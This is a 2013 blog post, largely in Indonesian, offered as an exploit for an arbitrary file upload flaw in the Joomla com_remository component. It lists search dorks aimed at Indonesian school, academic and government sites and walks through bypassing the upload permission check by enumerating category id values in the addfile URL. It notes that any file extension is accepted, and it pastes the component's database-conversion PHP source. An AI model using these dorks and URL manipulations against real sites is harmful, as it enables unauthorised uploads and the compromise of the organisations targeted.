Friday, 19 April 2013


Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability
<< Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability

<< Author : Z190T

<< Contact : mahruz[dot]id[at]gmail[dot]com

<< Homepage : http://mahruz-id.com/

<< Vendor : http://remository.com/downloads/

<< d0rk :

- inurl:"func=addfile" <– Organisation, School, Academic and Government of Indonesian Site

- inurl:"/func,addfile/" <– Organisation, School, Academic and Government of Indonesian Site

- inurl:"index.php?option=com_remository" <– free!!

<< File Allowed : Any File Extension

<< Try 0n : any OS


<< readme.

Sebelumnya,, saya hanya ingin memberi tau satu hal penting about pentingnya berhati2 memilih plugin atau componen web baik itu pada Joomla, WordPress, Drupal atau yang lainnya. ndak penting preview website yang kita bangun itu bagus, preview bagus ndak menjamin keamanan suatu website, yang terpenting adalah bagaimana website yang kita miliki terlihat simple dengan dukungan sistem keamanan di atas rata-rata.



Saya akan memberi tahu satu dari sekian banyak kelemahan component pada Joomla, yaitu Repository. Repository yang dimaksud di sini adalah acuan bahan atau file download yang disediakan secara terbuka untuk user, admin dan bahkan untuk semua pengunjung.



Remository adalah nama perubahan untuk Repository yang ada pada Joomla, entahlah,,, saya juga ndak mengerti, kenapa harus pkek nama Remository??

bodo amat!!.

udah ah,, kelamaan baca tulisan saya yang salbut!! langsung saja…



<< Untuk d0rk [inurl:"func=addfile"] dan [inurl:"index.php?option=com_remository"]

Contoh :

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=15

“You have no permitted upload categories – please refer to the webmaster”

Disana kita bisa melihat, kita tidak mempunyai izin untuk upload data dengan identitas 15 pada bagian 46, hanya Admin yang di perbolehkan untuk upload data ke area tersebut, lantas,,, bagaimana caranya supaya kita bisa upload data ke area tersebut? Ooo,,,, tidak bissaa…!! ß hanya orang bodoh yang mengatakan hal itu!. kita manipulasikan data yang akan kita masukkan!!, Let’s do it!!

Pada bagian ItemId ndak usah dirubah, yang kita rubah hanya id nya saja. inject-inject dikit supaya table uploadnya keluar!! ^_^

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=1

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=2

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=3

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=4

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=5

dan seterusnya.. sampai keluar croot-nya!! heheheheee….

Kalo bosen nginject, langsung patokin saja di angka tertinggi,, misalnya,,

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=99

tpi,, klo misalnya kita dapat di..

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=8

langsung dah upload!!, jangan lupa,, isi formnya,, supaya mudah mencari directory hasil uploadnya.

All Done!

Please Note: All Uploads will be reviewed prior to Publishing.

Yes!! kita berhasil!!

Pada bagian pencarian hasil upload ini yang menurut saya agak sulit soalnya file yang udah kita upload udah melalui converter pada bagian ../remositoryAdminDbonvert.php

isinya seperti ini..

<?php

class remositoryAdminDbconvert extends remositoryAdminControllers {

    function remositoryAdminDbconvert ($admin) {
        remositoryAdminControllers::remositoryAdminControllers ($admin);
        $_REQUEST['act'] = 'dbconvert';
    }
   
    function listTask () {
        $view =& new remositoryAdminHTML ($this, 0, '');
        $view->formStart(_DOWN_ADMIN_ACT_DBCONVERT);
        $interface =& remositoryInterface::getInstance();
        $database =& $interface->getDB();
        foreach (array('containers','files','reviews','structure','log','temp') as $tablename) {
            $sql = "TRUNCATE TABLE #__downloads_$tablename";
            remositoryRepository::doSQL($sql);
        }
        $sql = "ALTER TABLE #__downloads_containers AUTO_INCREMENT=2";
        remositoryRepository::doSQL($sql);
        $containermap = array('catid'=>array(),'folderid'=>array());
        $sql = "SELECT * FROM #__downloads_category";
        $database->setQuery($sql);
        $rows = $database->loadObjectList();
        if (!$rows) $rows = array();
        foreach ($rows as $row) {
            if ($row->registered) $row->registered = '0';
            else $row->registered = '2';
            foreach ($row as $field=>$value) {
                if (!is_numeric($row->$field)) $row->$field = $database->getEscaped($row->$field);
            }
            $sql = "INSERT INTO #__downloads_containers (parentid,name,published,description,filecount,icon,registered) VALUES (0,'$row->name',$row->published,'$row->description',$row->files,'$row->icon',$row->registered)";
            $database->setQuery($sql);
            if (!$database->query()) {
                echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
                exit();
            }
            $newid = $database->insertid();
            $containermap['catid'][$row->id] = $newid;
            $sql = "SELECT * FROM #__downloads_folders WHERE catid=$row->id";
            $database->setQuery($sql);
            $folders = $database->loadObjectList();
            if ($folders) {
                foreach ($folders as $folder) $this->convertfolder ($folder, $newid, $containermap);
            }
        }
        $sql = "SELECT * FROM #__downloads";
        $database->setQuery($sql);
        $files = $database->loadObjectList();
        if (!$files) $files = array();
        foreach ($files as $file) {
            $testurl = strtolower(trim($file->url));
            $findsite = strpos($testurl, strtolower(trim($interface->getCfg('live_site'))));
            if ($findsite===false){
                $islocal = '0';
                $realname = '';
                $filedate = date('Y-m-d');
                $url = $file->url;
                if (eregi(_REMOSITORY_REGEXP_URL,$url) OR eregi(_REMOSITORY_REGEXP_IP,$url)) $filefound = true;
                else $filefound = false;
            }
            else {
                $islocal = '1';
                $url_array=explode('/',$file->url);
                $url = '';
                $realname = $url_array[(count($url_array)-1)];
                $filepath = $this->repository->Down_Path.'/'.$realname;
                if (file_exists($filepath)) {
                    $filefound = true;
                    $filedate = date('Y-m-d', filemtime($this->repository->Down_Path.'/'.$realname));
                }
                else $filefound = false;
            }
            $containerid = 0;
            if ($file->catid != 0) {
                if (isset($containermap['catid'][$file->catid])) $containerid = $containermap['catid'][$file->catid];
                else echo '<tr><td>'.$file->id.'/'.$realname.'/'.$file->catid.'</td></tr>';
            }
            if ($file->folderid != 0) {
                if (isset($containermap['folderid'][$file->folderid])) $containerid = $containermap['folderid'][$file->folderid];
                else echo '<tr><td>'.$file->id.'/'.$realname.'/'.$file->folderid.'</td></tr>';
            }
            if ($filefound AND $containerid != 0) {
                foreach (get_class_vars(get_class($file)) as $field=>$value) if (is_string($file->$field)) $file->$field = $database->getEscaped($file->$field);
                $sql="INSERT INTO #__downloads_files (realname,islocal,containerid,published,url,description,smalldesc,autoshort,license,licenseagree,filetitle,filesize,filetype,downloads,icon,fileversion,fileauthor,filedate,filehomepage,screenurl,submittedby,submitdate) VALUES ('$realname',$islocal,$containerid,$file->published,'$url','$file->description','$file->smalldesc',$file->autoshort,'$file->license',$file->licenseagree,'$file->filename','$file->filesize','$file->filetype','$file->downloads','$file->icon','$file->fileversion','$file->fileauthor','$filedate','$file->filehomepage','$file->screenurl', $file->submittedby,'$file->submitdate')";
                $database->setQuery($sql);
                if (!$database->query()) {
                    echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
                    exit();
                }
                $newid = $database->insertid();
                $sql = "SELECT * FROM #__downloads_comments WHERE id=$file->id";
                $database->setQuery($sql);
                $comments = $database->loadObjectList();
                if ($comments) {
                    foreach ($comments as $comment) {
                        $sql = "INSERT INTO #__downloads_reviews (component,itemid,userid,title,comment,date) VALUES ('com_remository',$newid,'$comment->userid','Review Title','$comment->comment','$comment->time')";
                        $database->setQuery($sql);
                        remositoryRepository::doSQL($sql);
                    }
                }
            }
            else echo '<tr><td>'.$file->url.'</td></tr>';
        }
        $this->repository->resetCounts(array());
        echo '<tr><td class="message">'._DOWN_DB_CONVERT_OK.'</td></tr>';
        echo '</table></form>';
    }
   
    function convertfolder ($folder, $parent, &$containermap) {
        $interface =& remositoryInterface::getInstance();
        $database =& $interface->getDB();
        foreach ($folder as $field=>$value) {
            if (!is_numeric($folder->$field)) $folder->$field = $database->getEscaped($folder->$field);
        }
        if ($folder->registered) $folder->registered = '0';
        else $folder->registered = '2';
        $sql = "INSERT INTO #__downloads_containers (parentid,name,published,description,filecount,icon,registered) VALUES ($parent, '$folder->name', $folder->published, '$folder->description', '$folder->files', '$folder->icon', $folder->registered)";
        $database->setQuery($sql);
        if (!$database->query()) {
            echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
            exit();
        }
        $newid = $database->insertid();
        $containermap['folderid'][$folder->id] = $newid;
        $sql = "SELECT * FROM #__downloads_folders WHERE parentid=$folder->id";
        $database->setQuery($sql);
        $children = $database->loadObjectList();
        if ($children) {
            foreach ($children as $child) convertfolder ($child, $newid, $containermap);
        }
    }

}

?>
Silahkan kamu deskripsikan sendiri!! ^_^ heheheee….

<< Untuk d0rk [inurl:"/func,addfile/"]

Contoh :

http://localhost/index.php/downloads/func-addfile/

cara inject-nya ndak jauh beda,, hanya menambahkan /id/(angka). misalnya..

http://localhost/index.php/downloads/func-addfile/id/99

0 comments:

Post a Comment